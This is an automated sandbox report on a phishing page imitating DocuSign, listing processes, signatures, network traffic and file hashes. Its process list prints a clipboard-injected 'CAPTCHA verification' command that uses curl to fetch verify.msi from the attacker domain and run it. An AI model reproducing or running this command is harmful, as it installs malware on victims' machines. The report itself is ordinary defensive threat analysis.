Windows
Analysis Report
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
chrome.exe (PID: 1540 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --s tart-maxim ized "abou t:blank" MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 4564 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --no-pre-r ead-main-d ll --field -trial-han dle=1768,i ,135637233 0111955557 5,77563118 4214024089 6,262144 - -disable-f eatures=Op timization GuideModel Downloadin g,Optimiza tionHints, Optimizati onHintsFet ching,Opti mizationTa rgetPredic tion --var iations-se ed-version --mojo-pl atform-cha nnel-handl e=2148 /pr efetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
chrome.exe (PID: 6392 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://accou nt.esign.u s.com/docu mentWizard .html?Uv=4 WaUN2Pkric 74yNetF" MD5: E81F54E6C1129887AEA47E7D092680BF)
cmd.exe (PID: 4328 cmdline:
cmd /K cmd .exe /c cu rl.exe -s https://ac count.esig n.us.com/u ser-verify -H "x-sys tem-id: %c omputernam e%" -o %us erprofile% \verify.ms i && start %userprof ile%\verif y.msi && e cho CAPTCH A Code: 03 3561 && pa use && rem DocuSign CAPTCHA Ve rification Tool (ver . 2025.102 2) MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 6964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 6912 cmdline:
cmd.exe /c curl.exe -s https:/ /account.e sign.us.co m/user-ver ify -H "x- system-id: user-PC" -o C:\User s\user\ver ify.msi MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) curl.exe (PID: 6452 cmdline:
curl.exe - s https:// account.es ign.us.com /user-veri fy -H "x-s ystem-id: user-PC" - o C:\Users \user\veri fy.msi MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cleanup
- • Phishing
- • Networking
- • System Summary
- • Persistence and Installation Behavior
- • Malware Analysis System Evasion
- • HIPS / PFW / Operating System Protection Evasion
Click to jump to signature section
Phishing |
---|
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: |
Source: | Joe Sandbox AI: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | File deleted: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Window detected: |
Persistence and Installation Behavior |
---|
Source: | OCR Text: |
Source: | Clipboard modification: |
Source: | Last function: | ||
Source: | Last function: |
Source: | Binary or memory string: |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Command and Scripting Interpreter | 3 Browser Extensions | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 File Deletion | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
jsdelivr.map.fastly.net | 151.101.193.229 | true | false | high | |
google.com | 142.251.40.238 | true | false | high | |
play.google.com | 172.217.165.142 | true | false | high | |
www.google.com | 142.251.40.196 | true | false | high | |
upload.wikimedia.org | 208.80.154.240 | true | false | high | |
account.esign.us.com | 44.203.127.19 | true | true | unknown | |
cdn.jsdelivr.net | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
true | unknown | ||
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false | high | |||
true |
| unknown | ||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
151.101.193.229 | jsdelivr.map.fastly.net | United States | 54113 | FASTLYUS | false | |
208.80.154.240 | upload.wikimedia.org | United States | 14907 | WIKIMEDIAUS | false | |
44.203.127.19 | account.esign.us.com | United States | 14618 | AMAZON-AESUS | true | |
142.251.40.142 | unknown | United States | 15169 | GOOGLEUS | false | |
142.251.40.196 | www.google.com | United States | 15169 | GOOGLEUS | false | |
172.217.165.142 | play.google.com | United States | 15169 | GOOGLEUS | false |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1645433 |
Start date and time: | 2025-03-21 18:43:21 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 3m 22s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | browseurl.jbs |
Sample URL: | https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 20 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.phis.win@29/27@18/7 |
- Exclude process from analysis
(whitelisted): MpCmdRun.exe, S IHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, Text InputHost.exe - Excluded IPs from analysis (wh
itelisted): 142.251.40.131, 14 2.251.32.110, 142.250.80.110, 172.253.122.84, 142.250.80.78, 142.250.176.206, 142.251.40.1 06, 142.250.65.195, 17.253.97. 202, 17.253.97.204, 142.250.72 .99, 142.250.176.195, 17.253.3 .139, 17.253.3.134, 199.232.21 4.172, 142.251.40.238, 142.250 .80.42, 142.251.40.138, 172.21 7.165.138, 142.250.65.170, 142 .251.40.234, 142.250.80.106, 1 42.251.40.202, 142.250.80.74, 142.250.64.106, 142.250.80.10, 142.251.40.170, 142.250.64.74 , 142.250.176.202, 142.250.72. 106, 142.251.41.10, 142.251.35 .174, 142.250.65.238, 142.251. 40.206, 199.232.210.172, 142.2 51.40.195, 142.250.65.163, 184 .31.69.3, 192.168.2.6, 20.109. 210.53 - Excluded domains from analysis
(whitelisted): fonts.googleap is.com, fs.microsoft.com, acco unts.google.com, content-autof ill.googleapis.com, slscr.upda te.microsoft.com, fonts.gstati c.com, ctldl.windowsupdate.com , clientservices.googleapis.co m, developer.apple.com, fe3cr. delivery.mp.microsoft.com, dev eloper-cdn.apple.com.akadns.ne t, clients2.google.com, edgedl .me.gvt1.com, redirector.gvt1. com, update.googleapis.com, cl ients.l.google.com, www.gstati c.com, world-gen.g.aaplimg.com - Not all processes where analyz
ed, report is missing behavior information - Report size getting too big, t
oo many NtOpenFile calls found . - Some HTTPS proxied raw data pa
ckets have been limited to 10 per session. Please view the P CAPs for the complete data. - VT rate limit hit for: https:
//account.esign.us.com/documen tWizard.html?Uv=4WaUN2Pkric74y NetF
Time | Type | Description |
---|---|---|
18:44:42 | Clipboard |
Process: | C:\Windows\SysWOW64\curl.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10055680 |
Entropy (8bit): | 7.99703770777142 |
Encrypted: | true |
SSDEEP: | 196608:1wCYGozqoC3sktVQC6WGwW3YziyfzrvHWrHMJ/ZnznFE5xlNhsVm:1UDAvtCC6FlByfXvHWEZnzqZ |
MD5: | F35E55AB0B13D00D1237F09D2BC603DD |
SHA1: | D31368479E8E632DA929F2E385B6A31FFFA5B507 |
SHA-256: | 4DF441E0A284601615217184DC64FCF9427E659F534FFA6228BBBA152CEA4274 |
SHA-512: | 566B3C3733D396AC572A48A28059CC4FAF6169CBDEF82CA67A6A736C622D3C7988C395610D9CB4B087EB87978250ABA3707F1A0B32C258234E05591B715CA282 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 24368 |
Entropy (8bit): | 7.990776494170634 |
Encrypted: | true |
SSDEEP: | 384:dg3hlifU7dYMasNHvcIxoRqrYcyKRjpt2PJKYytsPLFOYYmHRlkaSsD:YqsdxxhcIxo8rPyKJpt6nyaPwtOR2aVD |
MD5: | 42B95430773B4A1DEDFCFDA8C03A1D4B |
SHA1: | 8581FACE3A3703B4807AA2440E5354EA55A6C4EE |
SHA-256: | B0E7558F4710A1E255B93E3DEEFE3AEBB19F3BB41C150F685A74D3B1A1C79E87 |
SHA-512: | 590E1E4DCA67CB9088844530EFF20725270421A6C521FC05CF09948DF81AB6DBB0A169F42B58B031AD888F0E7ED863A0221B9243BF2B502E805B82DDCCEE9573 |
Malicious: | false |
Reputation: | low |
URL: | https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZ9hiA.woff2 |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 569 |
Entropy (8bit): | 4.9023364401407115 |
Encrypted: | false |
SSDEEP: | 12:Uc11FP/sO6ZRoT6pHAcigkSAx/s6ZmOHc9n+5cMK00k14enEPCedG:3F8OYsKugXYmOOk4TfenEPCD |
MD5: | D90D7948B5841876B51C2D3D1FA7DF26 |
SHA1: | EA1B1FCEF5C8D9C1AEB5A27FB69B195CBC3F0A69 |
SHA-256: | CC0BC2CBACA383E1600D349E580513F188E4D745BF269B63FFAFF46A091FD196 |
SHA-512: | A2A131E36F8E0BE7015BF22C6FA6F5EA2FCF817EB5E11287CE3BA6274674F2AF3873B0265C8959BA915C05E2BEA4E4F7CF4590135213208CAB84130C6C607A9C |
Malicious: | false |
Reputation: | low |
URL: | https://fonts.googleapis.com/icon?family=Material+Icons |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 2591 |
Entropy (8bit): | 5.551944904436444 |
Encrypted: | false |
SSDEEP: | 48:ejOXaVujOXak8FZjjOXamjOXakj43rjOXadNjOXaUJc+uXjOXaYN0xD:aOXaVqOXak8FZHOXaiOXah3vOXa7OXan |
MD5: | 955A06E42819BE6A6D372B7C77E38E15 |
SHA1: | 843A09FE443606A6C6E0476C85F56E38F6979715 |
SHA-256: | A221060E887590FCA4A80048400D6FC61883803F27CF2266920C0B8A16C03D6C |
SHA-512: | 35F9A2383A890C955D24C609BCBDDD11F76574C08DF018FA2DE246C21889EEEA7D918E72ED7E4958F3D862F0196A89D1AA2096B45965B434F89D9A12EEB79165 |
Malicious: | false |
Reputation: | low |
URL: | https://fonts.googleapis.com/css2?family=Inter:wght@500&display=swap |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10804 |
Entropy (8bit): | 4.481624126994836 |
Encrypted: | false |
SSDEEP: | 192:v6+WE7QxvAjShzwzb7M1/myAYUNNdZnvGuQTF4U:v6+Pkxv44q/EH10U |
MD5: | 2928664FE1FC6ACA88583A6F606D60BA |
SHA1: | 2F2FE1CBD0563B3CE3EA79FCDF1549ED244B3993 |
SHA-256: | A26FC5B38380272C92E9019A2EB8B45542A66814B3E2B203772DB8904B9FB99F |
SHA-512: | 7D6F8B7E54A4DA3CF81C767B4AA40C3B04BAFE35F2DD77B85944DE4442F0B1DD1A8EDA0175DEB4652CF055094ACDC0D4B6E38ABE51C52A3DFBF887481315B347 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 10804 |
Entropy (8bit): | 4.481624126994836 |
Encrypted: | false |
SSDEEP: | 192:v6+WE7QxvAjShzwzb7M1/myAYUNNdZnvGuQTF4U:v6+Pkxv44q/EH10U |
MD5: | 2928664FE1FC6ACA88583A6F606D60BA |
SHA1: | 2F2FE1CBD0563B3CE3EA79FCDF1549ED244B3993 |
SHA-256: | A26FC5B38380272C92E9019A2EB8B45542A66814B3E2B203772DB8904B9FB99F |
SHA-512: | 7D6F8B7E54A4DA3CF81C767B4AA40C3B04BAFE35F2DD77B85944DE4442F0B1DD1A8EDA0175DEB4652CF055094ACDC0D4B6E38ABE51C52A3DFBF887481315B347 |
Malicious: | false |
Reputation: | low |
URL: | https://developer.apple.com/assets/elements/badges/download-on-the-app-store.svg |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 2228 |
Entropy (8bit): | 7.82817506159911 |
Encrypted: | false |
SSDEEP: | 48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D |
MD5: | EF9941290C50CD3866E2BA6B793F010D |
SHA1: | 4736508C795667DCEA21F8D864233031223B7832 |
SHA-256: | 1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A |
SHA-512: | A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9 |
Malicious: | false |
Reputation: | low |
URL: | https://www.gstatic.com/recaptcha/api2/logo_48.png |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 287196 |
Entropy (8bit): | 6.0648318979601905 |
Encrypted: | false |
SSDEEP: | 6144:7v0J0Yd5lHI38+QPbll7ga3ZYThRK5+VcJ/dg7qp:7vkvn9ISzll7FKhRjkf |
MD5: | C6E864E56E1CF59CC4CC22FAAD40F116 |
SHA1: | 6FC3B18767E861A496157D6EDFF783EAC2C44516 |
SHA-256: | CA9B4FE3468E648B04F9FC8957285A1205C76E8883EE2D2950CBE4235E896B27 |
SHA-512: | 5FFA6237B623773473398727CCE9FFAD83488127A61DB84D5F2596A52E3643C78768CFDF9706BF25F9118A91DECA5711ACB7DCE5AE5C03176D683A305C1580E8 |
Malicious: | false |
Reputation: | low |
URL: | https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 52 |
Entropy (8bit): | 4.5395834108987785 |
Encrypted: | false |
SSDEEP: | 3:OdCd/ZoSb9inuSISHmn:OdCd/ZoSb99Sfmn |
MD5: | E5ABEC1C9A505AC76B6AA29071ED1082 |
SHA1: | 9B3D310EAC34E7C05270AD5E902A077019B7D317 |
SHA-256: | 5F1331C24E99130BEBFCAC9910702F8D560DD09A639E3C29901402FE19A64D0E |
SHA-512: | D1C91772CB0DBA86C4D264963694BD05ED3B4E16C70A3EC66508F35F7257D4932A5D917B6CEA40FB8F1A5084510FC1CE314DD604991FCEDCA1BDEA4B831A0B33 |
Malicious: | false |
Reputation: | low |
URL: | https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIuCYHyZX_ZHdoAEgUNoV9LmxIFDZFhlU4SBQ2UkJL6EgUNBu27_yHmEUAwvElXuA==?alt=proto |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 20713 |
Entropy (8bit): | 5.053868437066879 |
Encrypted: | false |
SSDEEP: | 192:CBh5Cif2IgOmgOua1YldXaugk7OyC7AL2DSYy3epAd/3nsTeUxX:CB72InJaq+ROOyC7AN3Mu/XsTeUxX |
MD5: | 53EF696D417D353EFBD07C105F694756 |
SHA1: | F37FBCF88F577F3152B8EC113D83B843DC6E2BC8 |
SHA-256: | B166631D0898F5FBE179400EA31AECCF0F56A61977CEA7D56B3D6464A12FA2DF |
SHA-512: | 36FB911A53DFE9C1E9C50A811A73DEEDF3E8002A72AE386548D79755463B059023D67361B8DA5106ADE8B02E32AF6BECC1412E1EAD87B42B18DAF7CB3429DD60 |
Malicious: | false |
Reputation: | low |
URL: | https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.css |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2228 |
Entropy (8bit): | 7.82817506159911 |
Encrypted: | false |
SSDEEP: | 48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D |
MD5: | EF9941290C50CD3866E2BA6B793F010D |
SHA1: | 4736508C795667DCEA21F8D864233031223B7832 |
SHA-256: | 1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A |
SHA-512: | A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 462 |
Entropy (8bit): | 6.832834205355095 |
Encrypted: | false |
SSDEEP: | 12:6v/7ECUPfn6mCx9OOsTNmNLw8h6/KzSkCt1RKEM0Ht1B:xPiA1Z8h6yzRqWEMEr |
MD5: | 3116E1AF6C57317209879BED595ACE28 |
SHA1: | DB24192BD54896DA5994A8507942FA80A4427185 |
SHA-256: | 894EFF46E7DE96D535594F704E544C8B95F0956285AE535FCB9985D5C9996544 |
SHA-512: | 68108788CFE930A64BF38D19BA02FBFE271E37AD0FD21EC7939DC10BA10BBD3AA9029627506A140E55012A46C8931BDEF94C7FEB93F513F2B4A65F61C5A33AF8 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4904 |
Entropy (8bit): | 7.899029446643728 |
Encrypted: | false |
SSDEEP: | 96:OdBnjzG7DZTxqIfy33nn/qf46vhPQuAgul5SZBsj51v1f:OdBnjwDZTx5fy33no4ShRjuX2sd1vt |
MD5: | 1E91D02CF5A902F38F2923C006D79281 |
SHA1: | CB8126B32C2274E0394246B40BD0B7F9F847E44C |
SHA-256: | F72611E2DF8E88204009FD896D05D5E8E83C77009C63943BBFFA169559934849 |
SHA-512: | 54B69544DC55ADDC0B2DDC08418D1A0A34240697070FE47FEAE9E915C70D33EF662CE1B7154CBCAD84019D22F3291F138CC7298224D381CC740C2097478D4042 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 4904 |
Entropy (8bit): | 7.899029446643728 |
Encrypted: | false |
SSDEEP: | 96:OdBnjzG7DZTxqIfy33nn/qf46vhPQuAgul5SZBsj51v1f:OdBnjwDZTx5fy33no4ShRjuX2sd1vt |
MD5: | 1E91D02CF5A902F38F2923C006D79281 |
SHA1: | CB8126B32C2274E0394246B40BD0B7F9F847E44C |
SHA-256: | F72611E2DF8E88204009FD896D05D5E8E83C77009C63943BBFFA169559934849 |
SHA-512: | 54B69544DC55ADDC0B2DDC08418D1A0A34240697070FE47FEAE9E915C70D33EF662CE1B7154CBCAD84019D22F3291F138CC7298224D381CC740C2097478D4042 |
Malicious: | false |
Reputation: | low |
URL: | https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 462 |
Entropy (8bit): | 6.832834205355095 |
Encrypted: | false |
SSDEEP: | 12:6v/7ECUPfn6mCx9OOsTNmNLw8h6/KzSkCt1RKEM0Ht1B:xPiA1Z8h6yzRqWEMEr |
MD5: | 3116E1AF6C57317209879BED595ACE28 |
SHA1: | DB24192BD54896DA5994A8507942FA80A4427185 |
SHA-256: | 894EFF46E7DE96D535594F704E544C8B95F0956285AE535FCB9985D5C9996544 |
SHA-512: | 68108788CFE930A64BF38D19BA02FBFE271E37AD0FD21EC7939DC10BA10BBD3AA9029627506A140E55012A46C8931BDEF94C7FEB93F513F2B4A65F61C5A33AF8 |
Malicious: | false |
Reputation: | low |
URL: | https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Windows_logo_2012-Black.svg/25px-Windows_logo_2012-Black.svg.png |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 43365 |
Entropy (8bit): | 5.248811076277145 |
Encrypted: | false |
SSDEEP: | 768:WPbVoLscD1xXIIe6oOlCczwCF9av8Bm58uD7hWuUewNlaAU1GV1pUrxvXELQe2S7:QomIjigMb7h4lKiOGaLxm1m9Bk |
MD5: | 3042F5F45C2338989497F11F1E4813D8 |
SHA1: | 6D018A5F343991F4CBFDC5BA18B429787D1BF1C5 |
SHA-256: | EF23C3CAE3EDA672437471D564F354F2C93E9BBA47D4F789DB501C48DA758F3B |
SHA-512: | 6784183527360C5BFC2EB84C1326AB10FDEB0643830594FDD11C140BB758418176F55E1D7E487EF286191EDD11E93DFF28DBF7DBFBB45BA89C19651493D5748C |
Malicious: | false |
Reputation: | low |
URL: | https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.js |
Preview: |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Mar 21, 2025 18:44:27.924280882 CET | 192.168.2.6 | 1.1.1.1 | 0x6834 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:27.924544096 CET | 192.168.2.6 | 1.1.1.1 | 0x8e77 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:29.010727882 CET | 192.168.2.6 | 1.1.1.1 | 0x65ff | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:29.013665915 CET | 192.168.2.6 | 1.1.1.1 | 0x8caa | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:29.701042891 CET | 192.168.2.6 | 1.1.1.1 | 0xaf74 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:29.701426029 CET | 192.168.2.6 | 1.1.1.1 | 0x6ac9 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:30.084924936 CET | 192.168.2.6 | 1.1.1.1 | 0x12e1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:30.085071087 CET | 192.168.2.6 | 1.1.1.1 | 0x443d | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:30.592247009 CET | 192.168.2.6 | 1.1.1.1 | 0xc715 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:30.592390060 CET | 192.168.2.6 | 1.1.1.1 | 0x51a7 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:42.969039917 CET | 192.168.2.6 | 1.1.1.1 | 0xf02b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:42.969244003 CET | 192.168.2.6 | 1.1.1.1 | 0x9b1d | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:43.436299086 CET | 192.168.2.6 | 1.1.1.1 | 0x6512 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:43.591180086 CET | 192.168.2.6 | 1.1.1.1 | 0x6ad0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:43.591464996 CET | 192.168.2.6 | 1.1.1.1 | 0xf021 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:56.329937935 CET | 192.168.2.6 | 1.1.1.1 | 0x916e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:45:32.427767038 CET | 192.168.2.6 | 1.1.1.1 | 0x7350 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:45:32.427902937 CET | 192.168.2.6 | 1.1.1.1 | 0xf418 | Standard query (0) | 65 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Mar 21, 2025 18:44:28.030550003 CET | 1.1.1.1 | 192.168.2.6 | 0x8e77 | No error (0) | 65 | IN (0x0001) | false | |||
Mar 21, 2025 18:44:28.030592918 CET | 1.1.1.1 | 192.168.2.6 | 0x6834 | No error (0) | 142.251.40.196 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.140876055 CET | 1.1.1.1 | 192.168.2.6 | 0x65ff | No error (0) | 44.203.127.19 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.802022934 CET | 1.1.1.1 | 192.168.2.6 | 0x6ac9 | No error (0) | jsdelivr.map.fastly.net | CNAME (Canonical name) | IN (0x0001) | false | ||
